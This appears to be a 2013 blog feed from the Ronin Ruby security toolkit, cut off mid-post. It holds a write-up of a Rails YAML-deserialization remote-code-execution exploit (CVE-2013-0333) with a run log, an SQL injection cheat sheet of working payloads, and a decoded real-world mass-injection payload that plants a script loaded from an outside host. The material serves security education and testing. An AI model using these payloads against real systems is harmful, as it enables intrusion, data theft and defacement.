http://ronin-ruby.gihtub.io/images/favicon.ico http://ronin-ruby.gihtub.io/images/logo.png 2013-04-05T18:50:11-07:00 http://ronin-ruby.gihtub.io/blog/ Fri Apr 05 00:00:00 -0700 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/04/05/now-accepting-bitcoins.html <p>Ronin is now accepting <a href="http://bitcoin.org/">Bitcoin</a> donations!</p> <p><a href="bitcoin:12tWhiWQaNxc5q37BVt6HZv5iihbRUHayC?label=ronin">12tWhiWQaNxc5q37BVt6HZv5iihbRUHayC</a></p> <p>We decided to start accepting donations as a way for users to help support the development of Ronin. Once enough Bitcoins have been donated, we can set Bounties for new features, tip contributors or even buy a domain name from <a href="https://www.namecheap.com/support/payment-options/bitcoin.aspx">NameCheap</a>.</p> <p>Bitcoin is a virtual p2p crypto-currency, that is not regulated or taxed. This makes transferring Bitcoins far easier and safer than transferring funds via PayPal. An increasing amount of <a href="http://www.bitmit.net/">online</a> and <a href="https://en.bitcoin.it/wiki/Real_world_shops">offline</a> merchants are starting to accept Bitcoins. Bitcoins can be bought and sold on many of the online <a href="https://en.bitcoin.it/wiki/Buying_bitcoins">exchanges</a> with native currency.</p> Sat Mar 30 00:00:00 -0700 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/03/30/ideas-pages.html <p>Well, the deadline to submit Mentor Organization applications to <a href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Google Summer of Code 2013 (GSoC)</a> crept up on us again. Unfortunately, we were unable to submit an application in time. One of the requirements we were missing was ideas for projects that Students could work on.</p> <p>In order to prepare for Google Summer of Code 2014, we created Ideas pages on the Wikis:</p> <ul> <li><a href="https://github.com/ronin-ruby/ronin/wiki/Ideas">ronin</a></li> <li><a href="https://github.com/ronin-ruby/ronin-asm/wiki/Ideas">ronin-asm</a></li> <li><a href="https://github.com/ronin-ruby/ronin-bruteforcers/wiki/Ideas">ronin-bruteforcers</a></li> <li><a href="https://github.com/ronin-ruby/ronin-exploits/wiki/Ideas">ronin-exploits</a></li> <li><a href="https://github.com/ronin-ruby/ronin-scanners/wiki/Ideas">ronin-scanners</a></li> <li><a href="https://github.com/ronin-ruby/ronin-sql/wiki/Ideas">ronin-sql</a></li> </ul> <p>If you have an idea for a cool feature that Ronin is currently missing, add it to one of the Ideas pages. Who knows, someone might implement one of your ideas sooner than you think. ;)</p> Mon Jan 28 00:00:00 -0800 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/01/28/new-rails-poc.html <p><strong>TL;DR:</strong> Same YAML <a href="/blog/2013/01/09/rails-pocs.html">vulnerability</a>, different code-path.</p> <ul> <li><a href="https://gist.github.com/4660248">rails_omakase.rb</a></li> </ul> <p>Hot on the heels of <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>, <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo">CVE-2013-0333</a> was announced. A code-path was discovered that allows <code>text/json</code> requests to be translated into and parsed as YAML. This behavior <em>only</em> exists in Rails 2.3.x and 3.0.x.</p> <p>This exploit uses the same YAML deserialization technique as the previous <a href="https://gist.github.com/4499206">Rails PoC exploit</a>. Please see the previous <a href="/blog/2013/01/09/rails-pocs.html">write-up</a> for a detailed explanation of how to achieve Remote Code Execution (RCE) via <code>YAML.load</code>.</p> <h2>ActiveSupport::JSON</h2> <p>In Rails 3.0.x, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/decoding.rb">ActiveSupport::JSON</a> acts as a proxy to various JSON parsing libraries. By default Rails 3.0.x provides the <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a>, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">Yajl</a> and <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> backends. <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a> uses the <a href="http://flori.github.com/json/">json</a> gem, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">Yajl</a> uses the high-performance <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">yajl</a> JSON parser, and <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> attempts to translate JSON into YAML before passing it to <code>YAML.load</code>. Oddly enough, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> (and not <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a>) is the default JSON backend in Rails 3.0.x:</p> <div class="highlight"><pre><code class="ruby"><span class="ss">ActiveSupport</span><span class="p">:</span><span class="ss">:JSON</span><span class="o">.</span><span class="n">backend</span> <span class="c1"># =&gt; ActiveSupport::JSON::Backends::Yaml</span> </code></pre></div> <p>The problem with the <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> backend is that it's <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> method is incredibly naive. The method uses <a href="http://rubydoc.info/stdlib/strscan/StringScanner">StringScanner</a> to walk through the JSON string, replacing JSON tokens with their YAML equivalents. The method does not fully parse the JSON in order to emit proper YAML, nor does it validate that the input is actually valid JSON. This is our opening.</p> <p>However, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> does replace all <code>:</code> characters with <code>:</code>, in an attempt to convert JSON Hashes into YAML Hashes. This will corrupt our YAML tags:</p> <div class="highlight"><pre><code class="ruby"><span class="n">yaml</span> <span class="o">=</span> <span class="s2">&quot;--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection&quot;</span> <span class="ss">ActiveSupport</span><span class="p">:</span><span class="ss">:JSON</span><span class="o">::</span><span class="ss">Backends</span><span class="p">:</span><span class="ss">:Yaml</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="ss">:convert_json_to_yaml</span><span class="p">,</span><span class="n">yaml</span><span class="p">)</span> <span class="c1"># =&gt; &quot;--- !ruby/hash: ActionController: : Routing: : RouteSet: : NamedRouteCollection&quot;</span> </code></pre></div> <p>Luckily, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> also parses JSON unicode-escaped characters:</p> <div class="highlight"><pre><code class="ruby"><span class="ss">ActiveSupport</span><span class="p">:</span><span class="ss">:JSON</span><span class="o">::</span><span class="ss">Backends</span><span class="p">:</span><span class="ss">:Yaml</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="ss">:convert_json_to_yaml</span><span class="p">,</span><span class="n">yaml</span><span class="o">.</span><span class="n">gsub</span><span class="p">(</span><span class="s1">&#39;:&#39;</span><span class="p">,</span><span class="s1">&#39;\u003a&#39;</span><span class="p">))</span> <span class="c1"># =&gt; &quot;--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection&quot;</span> </code></pre></div> <p>Now to get the YAML payload from <a href="https://gist.github.com/4499206">rails_rce.rb</a> executing. The <code>module_eval</code>ed code in <a href="https://github.com/rails/rails/blob/v3.0.19/actionpack/lib/action_dispatch/routing/route_set.rb#L166-L171">ActionController::Routing::RouteSet::NamedRouteCollection#define_hash_access</a> was similar to that of Rails 2.8.x, and was changed in <a href="https://github.com/rails/rails/blob/v3.1.0/actionpack/lib/action_dispatch/routing/route_set.rb#L166-L171">Rails 3.1.x</a>. Due to this difference, we simply reused the Rails 2.x payload from the <a href="https://gist.github.com/4499206">rails_rce.rb</a> exploit.</p> <p>After some minor modifications to <a href="https://gist.github.com/4499206">rails_rce.rb</a> we had a working exploit:</p> <pre><code>$ rails_omakase http://localhost:3000/secrets "puts 'lol'" lol Started POST "/secrets" for 127.0.0.1 at 2013-01-28 18:53:18 -0800 Processing by SecretsController#show as Parameters: {"_json"=&gt;#&lt;ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x00000002221080 @routes={:"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=&gt;#&lt;struct defaults={:action=&gt;"create", :controller=&gt;"foos"}, required_parts=[], requirements={:action=&gt;"create", :controller=&gt;"foos"}, segment_keys=[:format]&gt;}, @helpers=[:"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path"], @module=#&lt;Module:0x00000002220fb8&gt;&gt;} Rendered text template (0.0ms) Completed 200 OK in 2ms (Views: 1.4ms | ActiveRecord: 0.0ms) </code></pre> <h2>Again?</h2> <p>When Rails was updated for <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>, it did not actually fix the underlying root cause, that the <a href="https://github.com/tenderlove/psych">Psych</a> YAML parser <a href="https://github.com/tenderlove/psych/issues/119">does not have a safe-mode</a>. As long as developers continue allowing user-input near <code>YAML.load</code>, and there is no safe-mode to prevent YAML from deserializing arbitrary Classes, YAML deserialization vulnerabilities will continue to pop up. In the meantime, there is a <a href="https://github.com/dtao/safe_yaml#readme">safe_yaml</a> library, which provides a safe-mode and does prevent <a href="https://gist.github.com/4660248">rails_omakase.rb</a> from working:</p> <pre><code>Started POST "/secrets" for 127.0.0.1 at 2013-01-28 21:34:37 -0800 Processing by SecretsController#show as Parameters: {"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=&gt;{"defaults"=&gt;{":action"=&gt;"create", ":controller"=&gt;"foos"}, "required_parts"=&gt;nil, "requirements"=&gt;{":action"=&gt;"create", ":controller"=&gt;"foos"}, "segment_keys"=&gt;[":format"]}} Rendered text template (0.0ms) Completed 200 OK in 2ms (Views: 1.2ms | ActiveRecord: 0.0ms) </code></pre> <p><strong>Update:</strong> <a href="https://twitter.com/nelhage">@nelhage</a> has also written a <a href="https://gist.github.com/4659489">monkey-patch</a> for YAML, that prevents any non-primitive objects from being deserialized. I have tested this workaround against <a href="https://gist.github.com/4660248">rails_omakase.rb</a> on Ruby 1.9.3-p362 and Rails 3.0.19, and can confirm it prevents the exploit from working. However, once loaded it effects all <code>YAML.load</code> calls and cannot be disabled.</p> <h2>Omakase?</h2> <p>I named this exploit <a href="https://gist.github.com/4660248">rails_omakase.rb</a>, as an ode to <a href="http://david.heinemeierhansson.com/2012/rails-is-omakase.html">Rails Is Omakase</a>; I highly recommend the <a href="http://gilesbowkett.blogspot.com/2013/01/a-dramatic-reading-of-rails-is-omakase.html">dramatic reading</a>. In the blog post, David Heinemeier Hansson (DHH) discusses the criticism Rails Core has received over their changes to default settings. His main complaint is that merely complaining about the changes, and not contributing code, does not improve the development process of Rails.</p> <p>This vulnerability was the result of <a href="https://github.com/rails/rails/commit/a87683fb38d6cf66f39a7bd3faa6c969c63b1f46">changing the default JSON backend</a> from <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a> to <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a>. Additionally, it is unclear why anyone would ever consider attempting to convert JSON into YAML, without fully parsing it first. Like wise, <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a> is equally perplexing, who could possibly think any good would come from embedding YAML in XML?</p> <p>Despite DHH's reassurance that Rails Core has the best of intentions when they change default settings, they can and do make mistakes.</p> Tue Jan 22 00:00:00 -0800 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/01/22/rsnake-sqli-cheat-sheet-using-ronin-sql-1-1-0.html <p>After the release of <a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a> 1.0.0, I wondered if we could recreate <a href="http://ha.ckers.org/sqlinjection/">RSnake's SQL Injection Cheat Sheet</a> using the new <a href="/docs/ronin-sql/Ronin/SQL.html">Ronin::SQL</a> Domain Specific Language (DSL). Let's see how far we can get.</p> <p>Normal SQL Injection:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span> <span class="k">OR</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># =&gt; 1 OR 1=1</span> </code></pre></div> <p>Normal SQL Injection using encapsulated data:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span><span class="s1">&#39; OR &#39;</span><span class="mi">1</span><span class="s1">&#39;=&#39;</span><span class="mi">1</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="ss">escape</span><span class="p">:</span> <span class="ss">:string</span><span class="p">)</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1&#39; OR &#39;1&#39;=&#39;1</span> </code></pre></div> <p>Blind SQL Injection:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span> <span class="k">AND</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 AND 1=1</span> </code></pre></div> <p>Blind SQL Injection to attempt to locate <code>tablename</code> by brute-force iteration through table name permutations:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span><span class="err">&#39;</span> <span class="k">AND</span> <span class="mi">1</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">tablenames</span><span class="p">);</span> <span class="c1">--</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="ss">escape</span><span class="p">:</span> <span class="ss">:string</span><span class="p">)</span> <span class="n">sqli</span><span class="o">.</span><span class="n">and</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="n">count</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="ss">:tablenames</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 AND (SELECT COUNT(*) FROM tablenames)=1</span> </code></pre></div> <p>Creating errors by calling non-existent tables:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span><span class="s1">&#39; AND non_existant_table = &#39;</span><span class="mi">1</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="ss">escape</span><span class="p">:</span> <span class="ss">:string</span><span class="p">)</span> <span class="n">sqli</span><span class="o">.</span><span class="n">and</span> <span class="p">{</span> <span class="n">non_existant_table</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1&#39; AND non_existant_table=&#39;1</span> </code></pre></div> <p>Dumping usernames:</p> <div class="highlight"><pre><code class="sql"><span class="s1">&#39; OR username IS NOT NULL OR username = &#39;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="ss">escape</span><span class="p">:</span> <span class="ss">:string</span><span class="p">)</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="n">username</span><span class="o">.</span><span class="n">is_not</span><span class="p">(</span><span class="n">null</span><span class="p">)</span> <span class="p">}</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="n">username</span> <span class="o">==</span> <span class="s1">&#39;&#39;</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1&#39; OR username IS NOT NULL OR username=&#39;</span> </code></pre></div> <p>Enumerating through database table names:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span> <span class="k">AND</span> <span class="n">ASCII</span><span class="p">(</span><span class="k">LOWER</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">TOP</span> <span class="mi">1</span> <span class="n">name</span> <span class="k">FROM</span> <span class="n">sysobjects</span> <span class="k">WHERE</span> <span class="n">xtype</span><span class="o">=</span><span class="s1">&#39;U&#39;</span><span class="p">),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)))</span> <span class="o">&gt;</span> <span class="mi">116</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">and</span> <span class="p">{</span> <span class="n">ascii</span><span class="p">(</span> <span class="n">lower</span><span class="p">(</span> <span class="n">substring</span><span class="p">(</span> <span class="nb">select</span><span class="p">(</span><span class="ss">:name</span><span class="p">)</span><span class="o">.</span><span class="n">top</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="n">sysobjects</span><span class="p">)</span><span class="o">.</span><span class="n">where</span> <span class="p">{</span> <span class="n">xtype</span> <span class="o">==</span> <span class="s1">&#39;U&#39;</span> <span class="p">},</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span> <span class="p">)</span> <span class="p">)</span> <span class="o">&gt;</span> <span class="mi">116</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype=&#39;U&#39;),1,1)))&gt;116</span> </code></pre></div> <p>Finding user supplied tables using the <code>sysObjects</code> table in SQL Server:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span> <span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="n">name</span> <span class="k">FROM</span> <span class="n">sysObjects</span> <span class="k">WHERE</span> <span class="n">xtype</span> <span class="o">=</span> <span class="s1">&#39;U&#39;</span> <span class="c1">--</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">union_all</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="nb">name</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="n">sysObjects</span><span class="p">)</span><span class="o">.</span><span class="n">where</span> <span class="p">{</span> <span class="n">xtype</span> <span class="o">==</span> <span class="s1">&#39;U&#39;</span> <span class="p">}</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span><span class="o">.</span><span class="n">to_sql</span><span class="p">(</span><span class="ss">:terminate</span> <span class="o">=&gt;</span> <span class="kp">true</span><span class="p">)</span> <span class="c1"># 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype=&#39;U&#39;);--</span> </code></pre></div> <p>Bypass filters by using <code>/**/</code> instead of spaces:</p> <div class="highlight"><pre><code class="sql"><span class="mi">1</span><span class="cm">/**/</span><span class="k">UNION</span><span class="cm">/**/</span><span class="k">SELECT</span><span class="cm">/**/</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="n">id</span><span class="p">)</span><span class="cm">/**/</span><span class="k">FROM</span><span class="cm">/**/</span><span class="n">users</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span><span class="o">.</span><span class="n">to_sql</span><span class="p">(</span><span class="ss">:space</span> <span class="o">=&gt;</span> <span class="s1">&#39;/**/&#39;</span><span class="p">)</span> <span class="c1"># 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users</span> </code></pre></div> <p>Not too shabby!</p> Mon Jan 21 00:00:00 -0800 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/01/21/ronin-sql-1-0-0-released.html <p>After six years of development and neglect, <a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a> has been refactored and version 1.0.0 has finally been released! <a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a> is a library for encoding/decoding SQL data. It also includes a Ruby Domain Specific Language (DSL) for crafting complex <a href="http://en.wikipedia.org/wiki/SQL_injection">SQL Injections (SQLi)</a>.</p> <h2>Install</h2> <p><a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a> is available for installation as a <a href="https://rubygems.org/gems/ronin-sql">RubyGem</a>:</p> <pre><code>$ gem install ronin-sql </code></pre> <h2>What's New?</h2> <h3>Ruby 1.9</h3> <p><a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a> 1.0.0 requires Ruby >= 1.9.1. Ruby 1.8.7 is about to reach <a href="https://blog.engineyard.com/2012/ruby-1-8-7-and-ree-end-of-life/">End-Of-Life</a> and it's becoming difficult to develop for both 1.8 and 1.9. Additionally, Ruby 1.9 has many <a href="http://blog.newrelic.com/2012/10/23/eating-the-1-9-elephant/">performance improvements</a> over 1.8.7. Ruby 1.9.3 can be installed via <a href="https://rvm.io/">RVM</a> or via <a href="http://www.ubuntu.com/">Ubuntu</a> / <a href="http://fedoraproject.org/">Fedora</a> packages.</p> <h3>Convenience Methods</h3> <p>The [String#sql_escape], [String#sql_encode], [String#sql_decode] have been moved out of [ronin-support] and into <a href="https://github.com/ronin-ruby/ronin-sql#readme">ronin-sql</a>.</p> <p>Escape a String:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;O&#39;Brian&quot;</span><span class="o">.</span><span class="n">sql_escape</span> <span class="c1"># =&gt; &quot;&#39;O&#39;&#39;Brian&#39;&quot;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;O&#39;Brian&quot;</span><span class="o">.</span><span class="n">sql_escape</span><span class="p">(</span><span class="ss">:double</span><span class="p">)</span> <span class="c1"># =&gt; &quot;\&quot;O&#39;Brian\&quot;&quot;</span> </code></pre></div> <p>Unescapes a SQL String:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;&#39;O&#39;&#39;Brian&#39;&quot;</span><span class="o">.</span><span class="n">sql_unescape</span> <span class="c1"># =&gt; &quot;O&#39;Briand&quot;</span> </code></pre></div> <p>Hex encode a String:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;/etc/passwd&quot;</span><span class="o">.</span><span class="n">sql_encode</span> <span class="c1"># =&gt; &quot;0x2f6574632f706173737764&quot;</span> </code></pre></div> <p>Hex decode a String:</p> <div class="highlight"><pre><code class="ruby"><span class="n">string</span> <span class="o">=</span> <span class="s2">&quot;4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72&quot;</span> <span class="n">string</span><span class="o">.</span><span class="n">sql_decode</span> <span class="c1"># =&gt; &quot;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=&#39;u&#39; and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(&#39;update [&#39;+@T+&#39;] set [&#39;+@C+&#39;]=&#39;&#39;\&quot;&gt;&lt;/title&gt;&lt;script src=\&quot;http://www0.douhunqn.cn/csrss/w.js\&quot;&gt;&lt;/script&gt;&lt;!--&#39;&#39;+[&#39;+@C+&#39;] where &#39;+@C+&#39; not like &#39;&#39;%\&quot;&gt;&lt;/title&gt;&lt;script src=\&quot;http://www0.douhunqn.cn/csrss/w.js\&quot;&gt;&lt;/script&gt;&lt;!--&#39;&#39;&#39;)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor&quot;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;2f6574632f706173737764&quot;</span><span class="o">.</span><span class="n">sql_decode</span> <span class="c1"># =&gt; &quot;/etc/passwd&quot;</span> </code></pre></div> <p>Additionally, [String#sql_unescape] has been added:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;&#39;O&#39;&#39;Brian&#39;&quot;</span><span class="o">.</span><span class="n">sql_unescape</span> <span class="c1"># =&gt; &quot;O&#39;Brian&quot;</span> </code></pre></div> <h3>Ronin::SQL</h3> <p>The Ruby->SQL encoder has been refactored into into a fully-fledged <a href="https://github.com/rails/arel#readme">ARel</a>-like Ruby DSL:</p> <p>Injecting a <code>1=1</code> test into a String value:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="ss">:escape</span> <span class="o">=&gt;</span> <span class="ss">:string</span><span class="p">)</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1&#39; OR 